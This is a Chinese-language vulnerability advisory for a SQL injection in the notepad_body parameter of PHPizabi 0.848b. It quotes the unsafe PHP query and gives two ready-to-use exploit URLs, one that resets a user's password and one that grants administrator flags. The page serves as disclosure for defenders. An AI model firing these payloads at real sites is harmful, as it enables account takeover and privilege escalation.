频道栏目
首页 > 安全 > 网站安全 > 正文

PHPizabi notepad_body参数SQL注入漏洞

2009-03-27 00:40:18           
收藏   我要投稿
发布日期:2009-03-24
更新日期:2009-03-25

受影响系统
Real!ty Medias PHPizabi v0.848b C1 HFP1
描述:
BUGTRAQ  ID: 34223

PHPizabi是一款代码开源的在线交友、交流、婚介、商务合作系统。

PHPizabi的/theme/default/proc.inc.php模块中没有正确地验证用户所提交的notepad_body参数,远程攻击者可以通过提交恶意的查询请求执行SQL注入攻击。以下是有漏洞的代码段:

<?php

    function bufferProcParse($buffer) {
        global $CONF;
        
        $tpl = new template;
        $tpl -> LoadThis($buffer);
        // HANDLE POSTED NOTEPAD DATA
///////////////////////////////////////////////////////  if
(isset($_GET["notepad_body"])) {  myQ("UPDATE `[x]users` SET `notepad_body` =
".urldecode($_GET["notepad_body"])." WHERE `id`=".me("id")."");  me("flush");
        }
..

<*来源:bookoo
  
  链接:http://marc.info/?l=bugtraq&m=123791015512629&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%
http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*

建议:
厂商补丁:

Real!ty Medias
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.phpizabi.net/?L=home.index
相关TAG标签 漏洞 参数
上一篇:VSB网站综合管理平台0day
下一篇:iGuard简单突破
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站